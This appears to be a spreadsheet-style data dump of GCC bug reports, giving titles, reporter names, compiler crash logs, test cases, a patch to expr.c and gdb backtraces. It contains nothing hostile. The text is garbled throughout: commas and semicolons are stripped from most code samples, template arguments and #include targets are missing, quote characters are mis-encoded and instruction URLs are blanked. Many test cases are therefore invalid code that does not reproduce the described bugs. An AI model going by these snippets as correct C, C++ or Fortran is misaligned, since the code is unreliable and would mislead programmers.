#include ... search starts here:
#include  search starts here:
 /usr/local/lib/gcc/x86_64-unknown-linux-gnu/4.6.3/include
 /usr/local/include
 /usr/local/lib/gcc/x86_64-unknown-linux-gnu/4.6.3/include-fixed
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-O3' '-mtune=generic' '-march=x86-64'
 /usr/local/libexec/gcc/x86_64-unknown-linux-gnu/4.6.3/cc1 -fpreprocessed sample.i -quiet -dumpbase sample.c -mtune=generic -march=x86-64 -auxbase sample -O3 -version -o sample.s
GNU C (GCC) version 4.6.3 (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.6.3 GMP version 4.3.2 MPFR version 2.4.2-p1 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C (GCC) version 4.6.3 (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.6.3 GMP version 4.3.2 MPFR version 2.4.2-p1 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 4cf08a0fcb4b2719a02f394936c437ef
sample.c: In function â€˜mainâ€™:
sample.c:15:17: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Currently I am working around this by applying the following patch.
diff -rupN gcc-4.6.3/gcc/expr.c gcc-4.6.3.new1/gcc/expr.c
--- gcc-4.6.3/gcc/expr.c        2012-02-09 09:28:22.000000000 -0800
+++ gcc-4.6.3.new1/gcc/expr.c   2012-06-20 22:53:10.613748645 -0700
@@ -91826 +91827 @@ expand_expr_real_1 (tree exp rtx target
        orig_op0 = op0
          = expand_expr (tem
                         (TREE_CODE (TREE_TYPE (tem)) == UNION_TYPE
+              &amp;&amp; TYPE_SIZE (TREE_TYPE (tem))
                          &amp;&amp; (TREE_CODE (TYPE_SIZE (TREE_TYPE (tem)))
                              != INTEGER_CST)
                          &amp;&amp; modifier != EXPAND_STACK_PARM</t>
  </si>
  <si>
    <t>samueldotj</t>
  </si>
  <si>
    <t>GCC-14575</t>
  </si>
  <si>
    <t>[3.4 Regression] ICE while building xpdf-3.00</t>
  </si>
  <si>
    <t>gcc version 3.4.0 20040310 (prerelease) 
g++ -O3 -march=athlon-xp -mfpmath=sse -pipe -ffast-math -ftracer -save-temps 
-DHAVE_CONFIG_H -I.. -I./../goo -I./../fofi -I./../splash -I. 
-I/usr/include/freetype2          -I/usr/X11R6/include -c GlobalParams.cc 
GlobalParams.cc: In member function `void GlobalParams::parseFile(GString* 
FILE*)': 
GlobalParams.cc:476: internal compiler error: Segmentation fault 
Please submit a full bug report 
with preprocessed source if appropriate. 
See  for instructions. 
make: *** [GlobalParams.o] Error 1</t>
  </si>
  <si>
    <t>jkillius</t>
  </si>
  <si>
    <t>GCC-2716</t>
  </si>
  <si>
    <t>libgcc_s.so not installed correctly</t>
  </si>
  <si>
    <t>libgcc_s.so does not seem to get installed when I build and
install.  This library is required for some sort of floating
point support ... when linking with a copy of the GNUstep
base library built with this compiler I got __fixunsdfdi and __fixunssfdi undefined until I copied libgcc_s.so to
/usr/lib.
NB. gcc was built with --prefix=/usr
Release:
gcc version 3.1 20010502 (experimental)
Environment:
RedHat 6 Intel
How-To-Repeat:
Build and install a copy of the compiler on a clean system.</t>
  </si>
  <si>
    <t>rfm</t>
  </si>
  <si>
    <t>GCC-25030</t>
  </si>
  <si>
    <t>Character pointer can associated with not the same length character variable.</t>
  </si>
  <si>
    <t>In the following program pointer association is not allowd.
But I can compile successfully and get the output of random character
string whose length is 999.
I think this is wrong behavior.
program char_array_const
  implicit none
  character(len=999) pointer :: p
  character(len=12) target :: string = test string
  p =&gt; string
  print * trim(p)
end program</t>
  </si>
  <si>
    <t>iguchi</t>
  </si>
  <si>
    <t>GCC-35672</t>
  </si>
  <si>
    <t>[4.2 Regression] GCC 4.2.3 ICE on valid code: KDE 3.5.9 libdjvu compilation fails</t>
  </si>
  <si>
    <t>/bin/sh ../../../../libtool --silent --tag=CXX   --mode=compile g++ -DHAVE_CONFIG_H -I. -I../../../.. -I../../../.. -I/opt/kde3/include -I/usr/lib/qt3/include -I. -DQT_THREAD_SUPPORT  -D_REENTRANT -D_FILE_OFFSET_BITS=64 -D_LARGE_FILES=1  -Wno-long-long -Wundef -ansi -D_XOPEN_SOURCE=500 -D_BSD_SOURCE -Wcast-align -Wchar-subscripts -Wall -W -Wpointer-arith -DNDEBUG -DNO_DEBUG -O2 -march=pentium2 -O2 -mmmx -pipe -Wno-unused-variable -ftree-vectorize -ftree-loop-linear -fivopts -Wno-non-virtual-dtor -Wno-overloaded-virtual -Wno-deprecated -Wformat-security -Wmissing-format-attribute -Wno-non-virtual-dtor -fno-exceptions -fno-check-new -fno-common -DQT_CLEAN_NAMESPACE -DQT_NO_ASCII_CAST -DQT_NO_STL -DQT_NO_COMPAT -DQT_NO_TRANSLATION  -MT IW44Image.lo -MD -MP -MF .deps/IW44Image.Tpo -c -o IW44Image.lo IW44Image.cpp
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
... skipped ...
IW44Image.cpp: In static member function 'static void IW44Image::Transform::Decode::YCbCr_to_RGB(GPixel* int int int)':
IW44Image.cpp:1905: internal compiler error: Segmentation fault
GCC 4.3.0 works OK here.
Without '-fivopts' the code compiles just fine.</t>
  </si>
  <si>
    <t>GCC-5860</t>
  </si>
  <si>
    <t>cant build gcc-3.0.4 for powerpc-elf on rh7.2 missing includes</t>
  </si>
  <si>
    <t>When building gcc-3.0.4 on a redhat 7.2 host for the powerpc-elf target I get the following error:
/home/he/M3000/build/gcc/gcc/xgcc -B/home/he/M3000/build/gcc/gcc/ -B/home/he/M3000/crosstools//powerpc-elf/bin/ -B/home/he/M3000/crosstools//powerpc-elf/lib/ -isystem /home/he/M3000/crosstools//powerpc-elf/include -c -DHAVE_CONFIG_H -g -O2 -I. -I../../../../src/gcc-3.0.4/libiberty/../include  -W -Wall -Wtraditional -pedantic ../../../../src/gcc-3.0.4/libiberty/argv.c
../../../../src/gcc-3.0.4/libiberty/argv.c:35:20: string.h: No such file or directory
../../../../src/gcc-3.0.4/libiberty/argv.c:36:20: stdlib.h: No such file or directory
../../../../src/gcc-3.0.4/libiberty/argv.c: In function `dupargv':
../../../../src/gcc-3.0.4/libiberty/argv.c:101: warning: implicit declaration of function `malloc'
../../../../src/gcc-3.0.4/libiberty/argv.c:108: warning: implicit declaration of function `strlen'
../../../../src/gcc-3.0.4/libiberty/argv.c:109: warning: assignment makes pointer from integer without a cast
../../../../src/gcc-3.0.4/libiberty/argv.c:115: warning: implicit declaration of function `strcpy'
../../../../src/gcc-3.0.4/libiberty/argv.c: In function `freeargv':
../../../../src/gcc-3.0.4/libiberty/argv.c:153: warning: implicit declaration of function `free'
../../../../src/gcc-3.0.4/libiberty/argv.c:155: warning: function `free' was previously declared within a block
../../../../src/gcc-3.0.4/libiberty/argv.c: In function `buildargv':
../../../../src/gcc-3.0.4/libiberty/argv.c:237: warning: function `malloc' was previously declared within a block
../../../../src/gcc-3.0.4/libiberty/argv.c:242: warning: implicit declaration of function `realloc'
../../../../src/gcc-3.0.4/libiberty/argv.c:316: warning: implicit declaration of function `strdup'
../../../../src/gcc-3.0.4/libiberty/argv.c:316: warning: assignment makes pointer from integer without a cast
make[1]: *** [argv.o] Error 1
make[1]: Leaving directory `/home/he/M3000/build/gcc/powerpc-elf/libiberty'
make: *** [all-target-libiberty] Error 2
Is it neccecary to have a libc installed for the target when building where should the missing headers come from?
Release:
gcc-3.0.4
Environment:
Vanilla rh7.2+errata to date</t>
  </si>
  <si>
    <t>he</t>
  </si>
  <si>
    <t>GCC-55275</t>
  </si>
  <si>
    <t>abi_tag attribute doesn't work on explicit specializations of class templates</t>
  </si>
  <si>
    <t>This doesn't compile:
template
struct __attribute ((abi_tag(cxx11))) Foo
{
  int f()
}
template
struct
__attribute ((abi_tag(cxx11)))
Foo
{
  int f()
}
int main()
{
  Foo f
  f.f()
}
abi.cc:10:1: error: redeclaration of â€˜struct Fooâ€™ adds abi tag cxx11
 Foo
 ^
abi.cc:2:41: note: previous declaration here
 struct __attribute ((abi_tag(cxx11))) Foo
                                         ^
If I remove the attribute from the specialization then it compiles but the name of the specialization doesn't include the abi_tag:
                 U _ZN3FooIiE1fEv
I want to use this with std::future which has explicit specializations.</t>
  </si>
  <si>
    <t>GCC-9223</t>
  </si>
  <si>
    <t>[3.2/3.3 regression] Parse error for fully qualified name in namespace</t>
  </si>
  <si>
    <t>namespace ns
{
const int ci = 0
struct C
{
  C(int i)
}
void operator&lt;&lt;(C c int)
void
test()
{
  C( ::ns::ci) &lt;&lt; 1	
}
}
Release:
3.2.1
Environment:
i686-pc-linux-gnu Redhat Linux 8.0 thread mode posix.
How-To-Repeat:
/opt/gcc/bin/g++ -c -o /dev/null /tmp/gcc_parse_bug.ii
/tmp/gcc_parse_bug.ii: In function `void ns::test()':
/tmp/gcc_parse_bug.ii:12: parse error before `&lt;&lt;' token</t>
  </si>
  <si>
    <t>lalle</t>
  </si>
  <si>
    <t>GCC-47199</t>
  </si>
  <si>
    <t>[4.6 Regression] [C++0x] ICE: expected class 'type' have 'declaration' (function_decl) in same_type_ignoring_top_level_qualifiers_p at cp/typeck.c:1407 with -fno-elide-constructors</t>
  </si>
  <si>
    <t>Created attachment 22917
reduced testcase
Compiler output:
$ gcc -std=c++0x -fno-elide-constructors pr47199.C  
pr47199.C:14:34:   in constexpr expansion of 'S &gt;::s [with int  = 0 S &gt; = S]()'
pr47199.C:14:36:   in constexpr expansion of 'S((*(const S*)(&amp; S(-0x00000000000000001))))'
pr47199.C:14:36: internal compiler error: tree check: expected class 'type' have 'declaration' (function_decl) in same_type_ignoring_top_level_qualifiers_p at cp/typeck.c:1407
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
May be related to PR47041 small changes to the testcase result in ICE described there.
Tested revisions:
r168535 - crash
r165699 - code is rejected
Testcase was reduced from libstdc++-v3/testsuite/20_util/duration/comparison_operators/constexpr.cc it fails with the same ICE</t>
  </si>
  <si>
    <t>GCC-46800</t>
  </si>
  <si>
    <t>Handle CTRL-D correctly with STDIN</t>
  </si>
  <si>
    <t>With the given test case on READ from STDIN if an empty entry with LF is given first two CTRL-D are required to terminate the read.  G77 requires only one CTRL-D.
      number=999
   30 write(6*) 'Enter number1?'
      read(5*iostat=ios) number
      write(6*) 'ios= 'ios
      call bs5(ios)
      if(ios)  202010
   10 write(6*) 'Input Error'
      go to 30
   20 write(6*) number
   60 write(6*) 'Enter number2?'
      read(5*iostat=ios) number
      write(6*) 'ios= 'ios
      call bs5(ios)
      if(ios)  505040
   40 write(6*) 'Input Error'
      go to 60
   50 write(6*) number
      end
      subroutine bs5(ios)
      character *20 name
      if(ios.ge.0) go to 20
      name=TtyNam(5)
      close (unit=5)
      open(unit=5file=namestatus='old')
   20 return
      end</t>
  </si>
  <si>
    <t>GCC-2675</t>
  </si>
  <si>
    <t>3.0 branch ICE when inlining (does not occur on 2.95.2)</t>
  </si>
  <si>
    <t>The following code gets an ICE when compiled with
-O2 -finline-functions
(or -O3)
void f1 (double)
void f2 (int)
void
foo (int type double xx)
{
  if (type)
    f1 (xx)
  else
    f2 (type)
}
void
bar (int type)
{
  foo (type 1.0)
}
range.i: In function `bar':
range.i:18: Unrecognizable insn:
(insn/i 29 42 30 (set (reg:DF 24 %i0)
        (reg/v:SI 106)) -1 (nil)
    (expr_list:REG_DEAD (reg/v:SI 106)
        (expr_list:REG_EQUAL (const_int 0 [0x0])
            (nil))))
range.i:18: Internal compiler error in extract_insn at recog.c:2212
Please submit a full bug report with preprocessed source if appropriate.
See  for instructions.
Release:
unknown
Environment:
sun-sparc-solaris2.7
gcc snapshot from 2001-04-23
How-To-Repeat:
compile the code above using -O2 -finline-functions
on a sun-sparc-solaris2.7 machine with the 
gcc snapshot from 2001-04-23
It also crashes on the mainline.</t>
  </si>
  <si>
    <t>GCC-51761</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE in verify_gimple_stmt at tree-cfg.c:4241</t>
  </si>
  <si>
    <t>Created attachment 26247
preprocessed source
Building strongswan reveals:
&gt; ./cc1 -quiet chunk.i -O -m32
chunk.c: In function 'chunk_printable':
chunk.c:558:7: internal compiler error: in verify_gimple_stmt at tree-cfg.c:4314
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
#1  0x0000000000b57d26 in verify_gimple_stmt (stmt=0x7ffff58bbf28)
    at /space/rguenther/src/svn/trunk/gcc/tree-cfg.c:4314
4314          gcc_unreachable ()
(gdb) call debug_gimple_stmt (stmt)
&gt;&gt;</t>
  </si>
  <si>
    <t>GCC-67766</t>
  </si>
  <si>
    <t>[6 Regression]: Bootstrap failure on alpha-linux-gnu: ICE in simplify_subreg at simplify-rtx.c</t>
  </si>
  <si>
    <t>Created attachment 36416
Preprocessed testcase
alpha-linux-gnu bootstrap is currently broken due to r228175:
2015-09-27  Alexandre Oliva 
        PR rtl-optimization/64164
        PR tree-optimization/67312
        PR middle-end/67340
        PR middle-end/67490
        PR bootstrap/67597
        * cfgexpand.c (parm_in_stack_slot_p): Remove.
        (ssa_default_def_partition): Remove.
        (get_rtl_for_parm_ssa_default_def): Remove.
        (set_rtl): Check that RTL assignments match expectations.
        Loop on SUBREGs CONCATs and PARALLELs subexprs.  Set only the
        default def location for params and results.  Record SSA names
        or types in REG and MEM attrs respectively.
        ...
The ICE can be reproduced with a crosscompiler from x86_64-linux-gnu to alpha-linux-gnu configured with: --target=alpha-linux-gnu --enable-languages=c --with-long-double-128
~/gcc-build-alpha/gcc/cc1 -O2 -quiet -fpreprocessed -o libgcc2.o libgcc2.i
/space/homedirs/uros/gcc-svn/trunk/libgcc/libgcc2.c: In function â€˜__mulsc3â€™:
/space/homedirs/uros/gcc-svn/trunk/libgcc/libgcc2.c:1992:1: internal compiler error: in simplify_subreg at simplify-rtx.c:5807
0xa50bb0 simplify_subreg(machine_mode rtx_def* machine_mode unsigned int)
        ../../gcc-svn/trunk/gcc/simplify-rtx.c:5807
0xa5104c simplify_gen_subreg(machine_mode rtx_def* machine_mode unsigned int)
        ../../gcc-svn/trunk/gcc/simplify-rtx.c:6031
0xa1a494 gen_lowpart_general(machine_mode rtx_def*)
        ../../gcc-svn/trunk/gcc/rtlhooks.c:54
0x7885cf convert_move(rtx_def* rtx_def* int)
        ../../gcc-svn/trunk/gcc/expr.c:581
0x7e6edd expand_function_end()
        ../../gcc-svn/trunk/gcc/function.c:5461
0x67c669 construct_exit_block
        ../../gcc-svn/trunk/gcc/cfgexpand.c:5820
0x67c669 execute
        ../../gcc-svn/trunk/gcc/cfgexpand.c:6326
Please submit a full bug report
[...]
gdb session:
Breakpoint 1 internal_error (gmsgid=0x11f6cd5 in %s at %s:%d) at ../../gcc-svn/trunk/gcc/diagnostic.c:1134
1134    internal_error (const char *gmsgid ...)
(gdb) bt
#0  internal_error (gmsgid=0x11f6cd5 in %s at %s:%d) at ../../gcc-svn/trunk/gcc/diagnostic.c:1134
#1  0x000000000102091c in fancy_abort (file= line=5807 
    function=0x1121860  simplify_subreg)
    at ../../gcc-svn/trunk/gcc/diagnostic.c:1209
#2  0x0000000000a50bb1 in simplify_subreg (outermode=VOIDmode op=0x2aaaaeae4d20 innermode=SCmode byte=0)
    at ../../gcc-svn/trunk/gcc/simplify-rtx.c:5807
#3  0x0000000000a5104d in simplify_gen_subreg (outermode=18836693 
    op=0x1121860  innermode=17959616 byte=5807)
    at ../../gcc-svn/trunk/gcc/simplify-rtx.c:6031
#4  0x0000000000a1a495 in gen_lowpart_general (mode=VOIDmode x=0x2aaaaeae4d20) at ../../gcc-svn/trunk/gcc/rtlhooks.c:54
#5  0x00000000007885d0 in convert_move (to=0x2aaaaea95df0 from= unsignedp=0) at ../../gcc-svn/trunk/gcc/expr.c:581
#6  0x00000000007e6ede in expand_function_end () at ../../gcc-svn/trunk/gcc/function.c:5461
#7  0x000000000067c66a in construct_exit_block () at ../../gcc-svn/trunk/gcc/cfgexpand.c:5820
#8  (anonymous namespace)::pass_expand::execute (this= fun=0x2aaaaea8b348) at ../../gcc-svn/trunk/gcc/cfgexpand.c:6326
convert_move tries to generate a VOIDmode subreg:
(gdb) f 5
#5  0x00000000007885d0 in convert_move (to=0x2aaaaea95df0 from= unsignedp=0) at ../../gcc-svn/trunk/gcc/expr.c:581
581           emit_move_insn (to gen_lowpart (to_mode from))
(gdb) p debug_rtx (to)
(parallel/i [
        (expr_list:REG_DEP_TRUE (reg:SF 32 $f0)
            (const_int 0 [0]))
        (expr_list:REG_DEP_TRUE (reg:SF 33 $f1)
            (const_int 4 [0x4]))
    ])
$4 = void
(gdb) f 4
#4  0x0000000000a1a495 in gen_lowpart_general (mode=VOIDmode x=0x2aaaaeae4d20) at ../../gcc-svn/trunk/gcc/rtlhooks.c:54
54        rtx result = gen_lowpart_common (mode x)
(gdb) p mode
$5 = VOIDmode
(gdb) p debug_rtx (x)
(concat:SC (reg:SF 608)
    (reg:SF 609))
$6 = void</t>
  </si>
  <si>
    <t>GCC-6442</t>
  </si>
  <si>
    <t>Regression wrt 3.0.x: undefined reference to `std::__basic_file::is_open()'</t>
  </si>
  <si>
    <t>For some reason the implementation of `std::__basic_file::is_open()'
seems to be unavailable both at compile-time and at link-time.
This problem is not present in GCC 3.0.x.
Release:
gcc version 3.1 20020424 (prerelease)
Environment:
$ uname -a
Linux zoltan.unisuv.it 2.4.17 #18 Sat Dec 22 16:57:24 CET 2001 i686 unknown
$ /opt/bin/g++ -v
Reading specs from /opt/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
Configured with: ../gcc/configure --prefix=/opt : (reconfigured) ../gcc/configure --prefix=/opt
Thread model: single
gcc version 3.1 20020424 (prerelease)
How-To-Repeat:
$ /opt/bin/g++ bug.cc
/opt/lib/gcc-lib/i686-pc-linux-gnu/3.1/../../../libstdc++.so: undefined reference to `std::__basic_file::is_open()'
collect2: ld returned 1 exit status</t>
  </si>
  <si>
    <t>GCC-46394</t>
  </si>
  <si>
    <t>[C++0X] [4.6 Regression] no matching function with default template parameter</t>
  </si>
  <si>
    <t>This code recently stopped compiling. (I have a remove_cv on top of the remove_reference in the original code but it didn't look necessary to reproduce the problem)
#include 
#include 
#include 
struct A {
        template&lt;class...Uclass=
                typename std::enable_if&lt;
                !std::is_same&lt;
                std::tuple::type...&gt;
                std::tuple
                        &gt;::value
                        &gt;::type
                        &gt;
                        A(U
}
int main(){
        A a(123)
}
bug.cc: In function â€˜int main()â€™:
bug.cc:16:11: error: no matching function for call to â€˜A::A(int int int)â€™
bug.cc:13:13: note: candidates are: template A::A(U&amp;&amp; ...)
bug.cc:4:8: note:                 constexpr A::A(const A&amp;)
bug.cc:4:8: note:                 constexpr A::A(A&amp;&amp;)</t>
  </si>
  <si>
    <t>GCC-53824</t>
  </si>
  <si>
    <t>ICE with ALLOCATE of coarrays</t>
  </si>
  <si>
    <t>Test case by VladimÃ­r Fuka: http://gcc.gnu.org/ml/fortran/2012-06/msg00157.html
The ICE is in:
#0  0x00000000005b209b in gfc_dep_compare_expr (e1=0x0 e2=0x0)
    at fortran/dependency.c:254
#1  0x00000000005936f7 in resolve_allocate_deallocate (code=code@entry=0x1671700
    fcn=fcn@entry=0xe78399 ALLOCATE) at fortran/resolve.c:7439
Seemingly the NULL is neither handled in the caller nor in the callee. The check is part of
  /* Check that an allocate-object appears only once in the statement.  
     FIXME: Checking derived types is disabled.  */
...
                      /* Handle cases like allocate(v(3)%x(3) v(2)%x(3))
                         which are legal.  */
...
                          if (gfc_dep_compare_expr (par-&gt;start[0]
                                                    qar-&gt;start[0]) != 0)
(side question: Is the FIXME still valid?)
Which has been introduced 2011-01-05 for PR 46017
http://gcc.gnu.org/ml/gcc-cvs/2011-01/msg00123.html</t>
  </si>
  <si>
    <t>GCC-45504</t>
  </si>
  <si>
    <t>[4.6 Regression] Failed to bootstrap</t>
  </si>
  <si>
    <t>On Linux/ia64 revision 163772 gave
Usage: /export/gnu/import/svn/gcc-test/bld/./gcc/jvgenmain [OPTIONS]... CLASSNAMEmain [OUTFILE]
make[6]: *** [gjdoc] Error 1
Revision 163755 is OK.</t>
  </si>
  <si>
    <t>GCC-27643</t>
  </si>
  <si>
    <t>ICE in java_mark_cni_decl_local compiling bytecode-&gt;native</t>
  </si>
  <si>
    <t>The following test case crashes:
$ gcj -C PipeImpl.java
$ gcj -c *.class -o t.o
PipeImpl.java:0: internal compiler error: in java_mark_cni_decl_local at java/decl.c:2182
class PipeImpl
{
  public PipeImpl ()
  {
    VMPipe.init (this)
  }
}
final class VMPipe
{
  static native void init(PipeImpl self)
}</t>
  </si>
  <si>
    <t>GCC-80435</t>
  </si>
  <si>
    <t>Expose __gcov_flush to allow developers to dump coverage numbers on demand</t>
  </si>
  <si>
    <t>If a test program uses _exit in lieu of exit the end-user must call __gcov_flush. Unfortunately this API isn't currently exposed anywhere so calling it isn't possible unless someone adds appropriate extern's in program headers.
It would be really nice if this API was exposed so others didn't need to back a __gcov_flush definition in their sources (this seems to be the hack that multiple individuals are using to workaround __gcov_flush not being made public via binutils :( e.g. https://gcc.gnu.org/ml/gcc-help/2015-06/msg00135.html ).
The companion bug I filed for this on the LLVM side can be found here: http://bugs.llvm.org/show_bug.cgi?id=32555 .</t>
  </si>
  <si>
    <t>yaneurabeya</t>
  </si>
  <si>
    <t>GCC-23478</t>
  </si>
  <si>
    <t>[3.4 regression] Miscompilation due to reloading of a var that is also used in EH pad</t>
  </si>
  <si>
    <t>The following testcase is miscompiled on x86_64-linux at -O2.
Before global alloc/reload the interesting part of code is:
(reg:DI %rax) = (call _Znwm (1))
(reg:DI 81) = (reg:DI %rax)
...
(reg:DI %rdi) = (reg:DI 81)
(call _ZN2C1C1ERK2C3S2_S2_RPS1_ (%rdi ...)) - may throw EH pad .Leh
...
(reg:DI %rdi) = (reg:DI 81)
...
(barrier)
.Leh:
(reg:DI %rdi) = (reg:DI 81)
(call _ZdlPv (%rdi))
Now as the register preassure is pretty high there don't appear to be any
free usable call saved registers for pseudo 81 so global alloc assigns pseudo
81 into (reg:DI %r10) which is call clobbered.  Then reload saves it into stack
before the _ZN2C1C1ERK2C3S2_S2_RPS1_ call and restores it from the stack slot
after the call.  But doesn't restore it on the EH path as well.
So we end up with:
(reg:DI %rax) = (call _Znwm (1))
(reg:DI %r10 (81)) = (reg:DI %rax)
...
(reg:DI %rdi) = (reg:DI %r10 (81))
(mem:DI %rsp+24) = (reg:DI %r10 (81))
(call _ZN2C1C1ERK2C3S2_S2_RPS1_ (%rdi ...)) - may throw EH pad .Leh
(reg:DI %r10 (81)) = (mem:DI %rsp+24)
...
(reg:DI %rdi) = (reg:DI %r10 (81))
...
(barrier)
.Leh:
(reg:DI %rdi) = (reg:DI %r10 (81))
(call _ZdlPv (%rdi))
As this is a reload bug it is not reproduceable on != 3.4.x compilers I have
tried which doesn't mean the bug is present on 3.4.x only though.</t>
  </si>
  <si>
    <t>GCC-50317</t>
  </si>
  <si>
    <t>[4.7 Regression] missing DW_OP_GNU_implicit_pointer</t>
  </si>
  <si>
    <t>PASS: gcc (GCC) 4.6.2 20110907 (prerelease)
 : Abbrev Number: 5 (DW_TAG_variable)
       DW_AT_name        : p        
       DW_AT_location    : 16 byte block: f2 44 0 0 0 0 93 4 f2 51 0 0 0 0 93 4     (DW_OP_GNU_implicit_pointer:  0 DW_OP_piece: 4 DW_OP_GNU_implicit_pointer:  0 DW_OP_piece: 4)
(gdb) print *p[1]
$1 = 23
FAIL: gcc (GCC) 4.7.0 20110907 (experimental)
 : Abbrev Number: 5 (DW_TAG_variable)
       DW_AT_name        : p        
       DW_AT_location    : 10 byte block: f2 45 0 0 0 0 93 4 93 4   (DW_OP_GNU_implicit_pointer:  0 DW_OP_piece: 4 DW_OP_piece: 4)
(gdb) print *p[1]
Cannot access memory at address 0x0
GNU gdb (GDB) 7.3.50.20110907-cvs
(gdb) break foo
(gdb) run
(gdb) print *p[1]
static __attribute__((noinline noclone)) int foo (int i)
{
  int j = i
  int *p[2] = { 
  return *p[0] + *p[1]
}
int main (void)
{
  return foo (23)
}
That p[1] content definition is missing.
There are many incompletele debug info cases around filing it because it is a regression (visible on GDB testcase gdb.dwarf2/implptr.exp).</t>
  </si>
  <si>
    <t>GCC-377</t>
  </si>
  <si>
    <t>definition of __cplusplus to an explicit value</t>
  </si>
  <si>
    <t>According to the final c++ std __cplusplus is supposed to
be defined to the value 199711L.  Some code to handle
backwards compatibility may need to have this macro set
up with the correct value in order to detect whether or not
certain features or library elements might exist.
Release:
egcs CVS tree</t>
  </si>
  <si>
    <t>GCC-65122</t>
  </si>
  <si>
    <t>std::vector doesn't honor element alignment</t>
  </si>
  <si>
    <t>Created attachment 34807
testcase
Even in C++11 mode even with the C++11 alignas keyword element alignment isn't honored by std::vector.
$ g++ vectoralign.cpp -o a --std=c++11 &amp;&amp; ./a
ctor 0x2422010
ctor 0x2422050
Tested with a freshly built GCC 4.9.2 on Ubuntu x86-64.
Attaching testcase.
Note: this is morphing bug 53900.</t>
  </si>
  <si>
    <t>jacob.benoit.1</t>
  </si>
  <si>
    <t>GCC-70865</t>
  </si>
  <si>
    <t>[cilkplus] errors when using cilk features with precompiled headers</t>
  </si>
  <si>
    <t>Created attachment 38372
example that reproduces the problem
Using cilk features in a precompiled header file causes various compilation bugs if the options -std=c++1z and -fconcepts are also used. I attached an example that reproduces the bug. The code should compile fine (and does so if not using a pch or not using cilk features) but depending on what options are used gcc produces these different errors.
Using both -std=c++1z -fconcepts -fcilkplus (reproduced with Makefile) causes the error:
cc1plus: error: using result of function returning â€˜voidâ€™
(null):0: confused by earlier errors bailing out
make: *** [a] Error 1
Using just -std=c++1z (Makefile.v2) causes the error:
cc1plus: internal compiler error: Segmentation fault
0xb45bff crash_signal
	../../gcc/gcc/toplev.c:333
0x95565c gimplify_call_expr
	../../gcc/gcc/gimplify.c:2486
0x94d339 gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	../../gcc/gcc/gimplify.c:10258
0x95a381 force_gimple_operand_1(tree_node* gimple** bool (*)(tree_node*) tree_node*)
	../../gcc/gcc/gimplify-me.c:78
0x95a47f force_gimple_operand_gsi_1(gimple_stmt_iterator* tree_node* bool (*)(tree_node*) tree_node* bool gsi_iterator_update)
	../../gcc/gcc/gimplify-me.c:115
0xa5a757 expand_task_call
	../../gcc/gcc/omp-low.c:6865
0xa5a757 expand_omp_taskreg
	../../gcc/gcc/omp-low.c:7423
0xa6103f expand_omp
	../../gcc/gcc/omp-low.c:13799
0xa637ad execute_expand_omp
	../../gcc/gcc/omp-low.c:14028
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
make: *** [a] Error 1</t>
  </si>
  <si>
    <t>GCC-47348</t>
  </si>
  <si>
    <t>wrong string length with array constructor</t>
  </si>
  <si>
    <t>This one is strange it is with recent trunk.
ig25@linux-fd1f:~/Krempel/Char-4&gt; cat foo.f90
program main
  implicit none
  character(len=3) :: c(3)
  c = 'x'
  print '(3(A|))' (/ (/ trim(c(1)) 'a' /)//'c' 'cd' /)
  print '(3(A|))' (/ (/ c(1)(1:len_trim(c(1))) 'a' /)//'c' 'cd' /)
  print '(3(A|))' (/ (/ c(1)(1:1) 'a' /)//'c' 'cd' /)
end program main
ig25@linux-fd1f:~/Krempel/Char-4&gt; gfortran foo.f90
ig25@linux-fd1f:~/Krempel/Char-4&gt; ./a.out
xc|ac|cd|
x |a |cd|
xc|ac|cd|
The second line should be identical to the first and third one.
Modified from nested_array_constructor_2.f90 BTW.
Goes back at least to 4.4.1 so probably not a regression.</t>
  </si>
  <si>
    <t>GCC-44705</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/pr44674.c (internal compiler error)</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ /te
st/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr44674.c   -O -fprofile-generate -S  -o pr4
4674.s    (timeout = 300)
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr44674.c: In function 'jumpfunc':
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr44674.c:10:1: error: insn does not sati
sfy its constraints:
(insn 38 30 32 2 /test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr44674.c:9 (set (reg:QI
 28 %r28 [orig:112 jumplabel ] [112])
        (mem/c/i:QI (label_ref:SI [22 deleted]) [0 jumplabel+0 S1 A8])) 58 {*pa.
md:2936} (nil))
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/pr44674.c:10:1: internal compiler error: 
in reload_cse_simplify_operands at postreload.c:395
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
compiler exited with status 1
Also seen on trunk.</t>
  </si>
  <si>
    <t>GCC-19152</t>
  </si>
  <si>
    <t>[4.0 Regression] IMA and external inline don't get along</t>
  </si>
  <si>
    <t>Take the following files:
------ a.c  ------ 
extern inline void
f(void)
{
}
------ b.c  ------ 
void
f(void)
{
}
------ c.c  ------ 
extern inline void
f(void)
{
}
Compiling in any order should work.
Current situation:
a.c b.c. c.c: Does NOT.
a.c c.c b.c: DOES
b.c a.c c.c: Does NOT.
b.c c.c a.c: Does NOT.
Basically the order depends on where b.c is places if b.c is placed last it works otherwise it does not.
Note this is causing --enable-intermodule build to fail.</t>
  </si>
  <si>
    <t>GCC-4477</t>
  </si>
  <si>
    <t>sizeof on nested class members doesn't compile</t>
  </si>
  <si>
    <t>sizeof applied to a member of a nested class doesn't compile.
The diagnostics is different depending on whether sizeof appears in a
member function of the enclosing class or in a global function but
seems to be invalid in either case.
Release:
